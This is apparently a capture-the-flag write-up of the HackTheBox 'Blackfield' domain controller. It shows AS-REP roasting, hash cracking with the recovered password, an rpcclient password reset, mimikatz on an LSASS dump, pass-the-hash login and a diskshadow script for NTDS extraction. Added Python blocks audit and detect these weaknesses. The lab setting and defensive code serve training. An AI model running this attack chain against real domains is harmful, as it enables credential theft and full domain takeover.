NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 19:13 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
Initiating NSE at 19:13
Completed NSE at 19:13, 0.00s elapsed
Initiating Ping Scan at 19:13
Scanning 10.10.10.192 [4 ports]
Completed Ping Scan at 19:13, 0.60s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:13
Scanning blackfield.htb (10.10.10.192) [1000 ports]
Discovered open port 445/tcp on 10.10.10.192
Discovered open port 53/tcp on 10.10.10.192
Discovered open port 139/tcp on 10.10.10.192
Discovered open port 135/tcp on 10.10.10.192
Discovered open port 88/tcp on 10.10.10.192
Discovered open port 593/tcp on 10.10.10.192
Discovered open port 3268/tcp on 10.10.10.192
Discovered open port 389/tcp on 10.10.10.192
Completed SYN Stealth Scan at 19:13, 24.70s elapsed (1000 total ports)
Initiating Service scan at 19:13
Scanning 8 services on blackfield.htb (10.10.10.192)
Completed Service scan at 19:16, 156.27s elapsed (8 services on 1 host)
Initiating OS detection (try #1) against blackfield.htb (10.10.10.192)
Retrying OS detection (try #2) against blackfield.htb (10.10.10.192)
Initiating Traceroute at 19:16
Completed Traceroute at 19:16, 0.73s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 19:16
Completed Parallel DNS resolution of 2 hosts. at 19:16, 0.60s elapsed
NSE: Script scanning 10.10.10.192.
Initiating NSE at 19:16
Completed NSE at 19:17, 40.10s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 3.22s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Nmap scan report for blackfield.htb (10.10.10.192)
Host is up (0.51s latency).
Not shown: 992 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-07-10 20:49:11Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/10%Time=5F0870AA%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h05m04s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-07-10T20:51:52
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   721.31 ms 10.10.14.1
2   721.43 ms blackfield.htb (10.10.10.192)

NSE: Script Post-scanning.
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Initiating NSE at 19:17
Completed NSE at 19:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 235.29 seconds
           Raw packets sent: 2093 (95.776KB) | Rcvd: 111 (7.997KB)
PORT ENUMERATION
PORT 445
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #smbclient -L 10.10.10.192
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share
        z               Disk
SMB1 disabled -- no workgroup available
Next, let's look at the profiles$ share:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #smbclient \\\\10.10.10.192\\profiles$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 22:17:12 2020
  ..                                  D        0  Wed Jun  3 22:17:12 2020
  AAlleni                             D        0  Wed Jun  3 22:17:11 2020
  ABarteski                           D        0  Wed Jun  3 22:17:11 2020
  ABekesz                             D        0  Wed Jun  3 22:17:11 2020
  ABenzies                            D        0  Wed Jun  3 22:17:11 2020
  ABiemiller                          D        0  Wed Jun  3 22:17:11 2020
  AChampken                           D        0  Wed Jun  3 22:17:11 2020
<---->
These folder names look like usernames, so I built a user list from them. Kerberos enumeration needs a list of usernames, so I ran this list through the Kerberos script GetNPUsers.py:
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #python GetNPUsers.py blackfield.local/ -usersfile user.txt -dc-ip 10.10.10.192 -no-pass
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

<---->
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD.LOCAL:f740efb0de3b25d7772ffa79327a9774$bf66496d2586b4c4e88d093f23ced3da37775a3ac7383f264b94b15615bb2cc4d4135afb6d09846829caac8a5a248193ad2cea818f68b44f62af6ff3e959fd9c33565a61ed7a9da1d03e2ca3f62a0550d884b278c37979425b44d85109caaac4383b7677d08b560013ff2f530cebbffb0adc43c27ad2a0e7d1f826eddd13f7035413514c8047e6994970bbcb97928caa116148dc8ed918bdd60c06ded06ea66af321fe369239bffe5e6d6419e4f44b98c9bec1af1c24bad8a997fecaad188a53a09030ad71b53bb5e15b3555d90e071ae7116357c33be0ccce0aebe459f5435f708fa75792881ce6ac3a7f734ee457e3283fcf60
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
<---->
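The reason support's hash comes back is the UF_DONT_REQUIRE_PREAUTH flag in the account's userAccountControl attribute, which GetNPUsers.py names in its output. From the defender's side that is both an audit item (which accounts carry the flag) and a log signal (TGT requests with no pre-authentication). The Python below is an added example, not code from the original post or from Impacket: it checks account records for the flag and scans Security event 4768 records for the resulting AS-REP activity. All account records and events are constructed; the bit values and event field names are the real ones.

```python
# Added example, not part of the original post. It audits account records for
# the UF_DONT_REQUIRE_PREAUTH setting that GetNPUsers.py reports and looks for
# the matching AS-REP activity in Security event 4768 records. Every account
# record and event below is constructed.

UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # 4194304: Kerberos pre-authentication switched off

# Constructed stand-in for the result of an LDAP query such as
# (&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "support",    "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "svc_backup", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD},
    {"sAMAccountName": "audit2020",  "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "old_vendor", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
]


def preauth_disabled_accounts(accounts, include_disabled=False):
    """Names of accounts with DONT_REQUIRE_PREAUTH set.

    Disabled accounts are skipped by default: the KDC refuses them, so they
    cannot be AS-REP roasted, but the flag should still be cleaned up."""
    found = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(acct["sAMAccountName"])
    return found


# Constructed Security log records (event 4768, "A Kerberos authentication
# ticket (TGT) was requested") reduced to the fields a SIEM extracts.
# PreAuthType 0 = no pre-authentication performed, TicketEncryptionType 0x17 =
# RC4-HMAC: the combination GetNPUsers.py produces. A failed request
# (Status 0x19, KDC_ERR_PREAUTH_REQUIRED) also carries PreAuthType 0, which is
# why only successful requests (Status 0x0) count.
SAMPLE_4768 = [
    {"EventID": 4768, "TargetUserName": "support", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "10.10.14.5",
     "PreAuthType": "0", "TicketEncryptionType": "0xffffffff", "Status": "0x19"},
    {"EventID": 4768, "TargetUserName": "audit2020", "IpAddress": "10.10.10.50",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
]


def asrep_roast_indicators(events):
    """(user, source IP) for successful TGT requests without pre-auth and with an RC4 ticket."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") == "0" and ev.get("TicketEncryptionType", "").lower() == "0x17":
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits


if __name__ == "__main__":
    print("pre-auth disabled:", preauth_disabled_accounts(SAMPLE_ACCOUNTS))
    print("AS-REP roast indicators:", asrep_roast_indicators(SAMPLE_4768))
```

The fix for any account the audit returns is to clear the flag (it is rarely needed outside a few legacy Unix Kerberos clients) and rotate its password, since a hash that was already captured can still be cracked offline.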
Cracking this hash with hashcat (mode 18200, Kerberos 5 AS-REP etype 23) against rockyou.txt:
┌─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #hashcat -m 18200 -a 0 kerbhash ../../THM/Wordlists/rockyou.txt --force --show
$krb5asrep$23$support@BLACKFIELD.LOCAL:fad1ab0da848d218949d3da5661c74ad$8a5cd1423dab835c437cd8109d3339f511843122c04a914ada392308d3610605603d48350a03e18c5763cd61fecb0ffb4e48eaf3bcd45e059fe3f92071f3cd0549a3c29c2a0c2ea5b4e6f30ed63ab4005029e9496d7b8f376bea3bd65f3086d1e9b36674ed16c33feca721d40f64db3bd0c8cdd46df79849ffef9c481cddd78bd6b9d027b3ad5a68b6f00190d9c3ebe0e63913a087b48991baaded76086368a483c3b4f1658d9fb336648f145780c2f4535707ed6110ee5ff9623330c25680aa17c20dd885d6a4a88d93f98dcc8359fb32a876dc9263be6facc8cb3e44ec1d681e94df3c18b6febfb94ff19a7c8a7a3a0b891b8a:#00^BlackKnight
I tried this password with evil-winrm, smbclient and rpcclient. It worked against SMB and RPC, and rpcclient gave the most useful information.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $>
rpcclient: missing argument
rpcclient $> dir
command not found: dir
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
user:[BLACKFIELD553715] rid:[0x457]
<--->
Next I enumerated privileges:
┌─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $>
rpcclient: missing argument
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege   0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege        0:5 (0x0:0x5)
SeMachineAccountPrivilege       0:6 (0x0:0x6)
SeTcbPrivilege                  0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege        0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege        0:11 (0x0:0xb
<---->
From the privileges above, and with some help from a friend, I learned that I could reset another AD user's password. The procedure is described here:
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #rpcclient -U support 10.10.10.192
Enter WORKGROUP\support's password:
rpcclient $> setuserinfo2 audit2020 23 'liquid12@@#'
rpcclient $>
The new password has to meet the domain's complexity policy, otherwise the reset fails with an error. Now back to smbclient to access the other shares. The share that turned out to be useful, with real data in it and readable as audit2020, is forensic. It contains a folder with an lsass zip, a memory dump that stores credential hashes, so let's pull that ZIP out.
┌─[✗]─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #smbclient -U audit2020 \\\\10.10.10.192\\forensic
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> cd memory_analysis\
smb: \memory_analysis\> dir
  .                                   D        0  Fri May 29 01:58:33 2020
  ..                                  D        0  Fri May 29 01:58:33 2020
  conhost.zip                         A 37876530  Fri May 29 01:55:36 2020
  ctfmon.zip                          A 24962333  Fri May 29 01:55:45 2020
  dfsrs.zip                           A 23993305  Fri May 29 01:55:54 2020
  dllhost.zip                         A 18366396  Fri May 29 01:56:04 2020
  ismserv.zip                         A  8810157  Fri May 29 01:56:13 2020
  lsass.zip                           A 41936098  Fri May 29 01:55:08 2020
  mmc.zip                             A 64288607  Fri May 29 01:55:25 2020
  RuntimeBroker.zip                   A 13332174  Fri May 29 01:56:24 2020
  ServerManager.zip                   A 131983313  Fri May 29 01:56:49 2020
  sihost.zip                          A 33141744  Fri May 29 01:57:00 2020
  smartscreen.zip                     A 33756344  Fri May 29 01:57:11 2020
  svchost.zip                         A 14408833  Fri May 29 01:57:19 2020
  taskhostw.zip                       A 34631412  Fri May 29 01:57:30 2020
  winlogon.zip                        A 14255089  Fri May 29 01:57:38 2020
  wlms.zip                            A  4067425  Fri May 29 01:57:44 2020
  WmiPrvSE.zip                        A 18303252  Fri May 29 01:57:53 2020

                7846143 blocks of size 4096. 3931591 blocks available
smb: \memory_analysis\>
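An LSASS dump sitting on a share that a low-privilege account can read is the real problem in this step; the archive name alone gives it away. As an added example, not from the original post, the Python below parses an smbclient dir listing in the format shown above and flags file names that usually mean credential material was left behind, which is the sweep a defender would run over shares after a forensic or backup job. The listing is the post's own memory_analysis directory cut down to a few rows; the severity table is my own choice.

```python
import re

# Added example, not from the original post: parse an smbclient "dir" listing
# and flag file names that usually mean dumped credential material was left on
# a share. The listing is the post's forensic\memory_analysis directory, cut
# down to a few rows; the severity table is my own choice.
LISTING = """\
  .                                   D        0  Fri May 29 01:58:33 2020
  ..                                  D        0  Fri May 29 01:58:33 2020
  conhost.zip                         A 37876530  Fri May 29 01:55:36 2020
  lsass.zip                           A 41936098  Fri May 29 01:55:08 2020
  mmc.zip                             A 64288607  Fri May 29 01:55:25 2020
  winlogon.zip                        A 14255089  Fri May 29 01:57:38 2020

                7846143 blocks of size 4096. 3931591 blocks available
"""

# name, attribute letters (D directory, A archive, H hidden, S system,
# R read-only, N normal), size in bytes, modification time
ENTRY_RE = re.compile(
    r"^\s*(?P<name>.+?)\s+(?P<attrs>[DAHSRN]+)\s+(?P<size>\d+)\s+"
    r"(?P<mtime>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4})\s*$"
)

SENSITIVE = [
    (re.compile(r"^lsass.*\.(dmp|zip)$", re.I), "critical",
     "LSASS memory dump: holds the credentials of every session that was logged on"),
    (re.compile(r"^ntds\.dit$", re.I), "critical",
     "Active Directory database: every domain password hash"),
    (re.compile(r"^(sam|system|security)(\.hive|\.save|\.bak)?$", re.I), "critical",
     "registry hive: local hashes and the boot key that decrypts NTDS.dit"),
    (re.compile(r"\.(dmp|mdmp)$", re.I), "high",
     "process memory dump: may contain tokens, passwords or keys"),
    (re.compile(r"\.(kirbi|ccache|keytab)$", re.I), "high",
     "Kerberos ticket or key material"),
]


def parse_listing(text):
    """Turn smbclient dir output into dicts, skipping . and .. and the free-space footer."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m or m.group("name") in (".", ".."):
            continue
        entries.append({"name": m.group("name"), "attrs": m.group("attrs"),
                        "size": int(m.group("size")), "mtime": m.group("mtime")})
    return entries


def flag_sensitive(entries):
    """(severity, name, size, reason) for files whose name matches the table."""
    findings = []
    for e in entries:
        if "D" in e["attrs"]:
            continue
        for pat, severity, reason in SENSITIVE:
            if pat.search(e["name"]):
                findings.append((severity, e["name"], e["size"], reason))
                break
    return findings


if __name__ == "__main__":
    for sev, name, size, reason in flag_sensitive(parse_listing(LISTING)):
        print("[%s] %s (%d bytes): %s" % (sev.upper(), name, size, reason))
```

Name matching only catches the obvious cases; the other archives in that folder are process dumps too, and only the folder name says so. A share holding memory dumps should be restricted to the forensic team and the dumps removed once the analysis is done.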
First download the zip file; extracting it gives you lsass.DMP.
Open mimikatz and use this command:

After that, run this:

sekurlsa::logonPasswords

This gives you the hash for the user svc_backup.
GETTING USER ACCESS
┌─[root@liquid]─[~/Desktop/HTB/blackfield]
└──╼ #evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


    Directory: C:\Users\svc_backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/10/2020  10:01 AM                tmp
-ar---        7/10/2020   5:04 AM             34 user.txt
Now let's look for a way to escalate privileges:
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
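What whoami /all shows here is the core finding of the box: svc_backup is in Backup Operators and Remote Management Users, with SeBackupPrivilege and SeRestorePrivilege enabled, on a domain controller. As an added example, not code from the original post, the Python below parses that output and flags the groups and privileges a reviewer should treat as admin-equivalent on a DC. The input is the post's own whoami /all output for svc_backup; the risk tables are my own selection of well-known SIDs and privilege names.

```python
import re

# Added example, not from the original post: parse the output of "whoami /all"
# and flag groups and privileges that make an account dangerous on a domain
# controller. The input is the post's own output for svc_backup.
WHOAMI_ALL = r"""
USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

SID_RE = re.compile(r"\bS-1-[0-9-]+\b")
GROUP_RE = re.compile(r"^(?P<name>\S.*?)\s+(?P<type>Well-known group|Alias|Label|Group)\s+(?P<sid>S-1-[0-9-]+)")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")

# Well-known SIDs that should not appear for a low-privilege account on a DC (my selection).
HIGH_RISK_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators: can modify most user and group objects",
    "S-1-5-32-549": "Server Operators: can control services and shares on the DC",
    "S-1-5-32-551": "Backup Operators: reads and writes any file regardless of ACL; on a DC that covers NTDS.dit and the registry hives",
    "S-1-5-32-580": "Remote Management Users: may log on over WinRM",
}
HIGH_RISK_PRIVS = {
    "SeBackupPrivilege": "bypasses read ACLs (backup semantics)",
    "SeRestorePrivilege": "bypasses write ACLs (restore semantics)",
    "SeDebugPrivilege": "can open any process, including LSASS",
    "SeImpersonatePrivilege": "can impersonate other users' tokens",
    "SeTakeOwnershipPrivilege": "can take ownership of any object",
}


def parse_whoami_all(text):
    """Sections are recognised by their '... INFORMATION' headers."""
    result = {"user": None, "groups": [], "privileges": {}}
    section = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith(" INFORMATION"):
            section = line[: -len(" INFORMATION")]
            continue
        if section == "USER":
            m = SID_RE.search(line)
            if m:
                result["user"] = line[: m.start()].strip()
        elif section == "GROUP":
            m = GROUP_RE.match(line)
            if m:
                result["groups"].append((m.group("name"), m.group("sid")))
        elif section == "PRIVILEGES":
            m = PRIV_RE.match(line)
            if m:
                result["privileges"][m.group(1)] = m.group(2)
    return result


def assess_risk(parsed):
    findings = []
    sids = {sid for _, sid in parsed["groups"]}
    for name, sid in parsed["groups"]:
        if sid in HIGH_RISK_GROUPS:
            findings.append("group %s (%s): %s" % (name, sid, HIGH_RISK_GROUPS[sid]))
    for priv, state in parsed["privileges"].items():
        if priv in HIGH_RISK_PRIVS:
            findings.append("privilege %s [%s]: %s" % (priv, state, HIGH_RISK_PRIVS[priv]))
    if "S-1-5-32-551" in sids and "S-1-5-32-580" in sids:
        findings.append("combination: Backup Operators plus Remote Management Users on a DC is domain-admin equivalent; remove the membership or keep backup accounts off remote logon")
    return findings


if __name__ == "__main__":
    for f in assess_risk(parse_whoami_all(WHOAMI_ALL)):
        print("*", f)
```

The same parser can be pointed at whoami /all output collected from any host; the combination rule is the one that matters for a DC, because a backup account that can only log on at the console is far less exposed than one reachable over WinRM.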
GETTING ROOT ACCESS
In brief, what we are going to do is create a shadow copy of the C: drive and read files out of it. Since this is an AD box, the file we want is the NTDS database, which stores the domain password hashes; we also need the SYSTEM hive, so that Impacket's secretsdump script can decrypt the database and give us the hashes.
DISKSHADOW SCRIPT THAT CREATES A SHADOW COPY OF THE C: DRIVE:
set context persistent nowriters#
add volume C: alias test#
create#
expose %test% g:#
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd ../../../
*Evil-WinRM* PS C:\> mkdir temp


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/10/2020   4:07 PM                temp


*Evil-WinRM* PS C:\> cd temp
*Evil-WinRM* PS C:\temp> upload diskexploit.txt
Info: Uploading diskexploit.txt to C:\temp\diskexploit.txt

Data: 112 bytes of 112 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/10/2020   4:08 PM             86 diskexploit.txt


*Evil-WinRM* PS C:\temp> diskshadow /s diskexploit.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  7/10/2020 4:09:11 PM

-> set context persistent nowriters
-> add volume C: alias new1
-> create
Alias new1 for shadow ID {6067a30e-a018-4980-b41f-7c734e81b825} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {534f88ab-b505-4e7f-ab7e-5c545f423da1} set as environment variable.

Querying all shadow copies with the shadow copy set ID {534f88ab-b505-4e7f-ab7e-5c545f423da1}

        * Shadow copy ID = {6067a30e-a018-4980-b41f-7c734e81b825}               %new1%
                - Shadow copy set: {534f88ab-b505-4e7f-ab7e-5c545f423da1}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 7/10/2020 4:09:12 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %new1% g:
-> %new1% = {6067a30e-a018-4980-b41f-7c734e81b825}
The shadow copy was successfully exposed as g:\.
->
*Evil-WinRM* PS C:\temp> g:
*Evil-WinRM* PS G:\> ls


    Directory: G:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/26/2020   5:38 PM                PerfLogs
d-----         6/3/2020   9:47 AM                profiles
d-r---        3/19/2020  11:08 AM                Program Files
d-----         2/1/2020  11:05 AM                Program Files (x86)
d-----        7/10/2020   4:08 PM                temp
d-r---        2/23/2020   9:16 AM                Users
d-----        5/28/2020   9:34 AM                Windows


*Evil-WinRM* PS G:\> cd Windows
*Evil-WinRM* PS G:\Windows> ls


    Directory: G:\Windows


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
<---->
d-----        9/15/2018  12:19 AM                diagnostics
d-----        9/15/2018   2:08 AM                DigitalLocker
d---s-        9/15/2018  12:19 AM                Downloaded Program Files
d-----        9/15/2018  12:19 AM                drivers
d-----        9/15/2018   2:08 AM                en-US
d-r-s-         9/6/2019   5:31 PM                Fonts
d-----        9/15/2018  12:19 AM                Globalization
d-----        9/15/2018   2:08 AM                Help
d-----        9/15/2018  12:19 AM                IdentityCRL
d-----        9/15/2018   2:08 AM                IME
d-r---        2/28/2020   4:26 PM                ImmersiveControlPanel
d-----        7/10/2020   9:41 AM                INF
d-----        9/15/2018  12:19 AM                InputMethod
d-----        9/15/2018  12:19 AM                L2Schemas
d-----        9/15/2018  12:19 AM                LiveKernelReports
d-----        5/26/2020   5:36 PM                Logs
d-r-s-        9/15/2018  12:19 AM                media
d-r---        7/10/2020   4:58 AM                Microsoft.NET
d-----        9/15/2018  12:19 AM                Migration
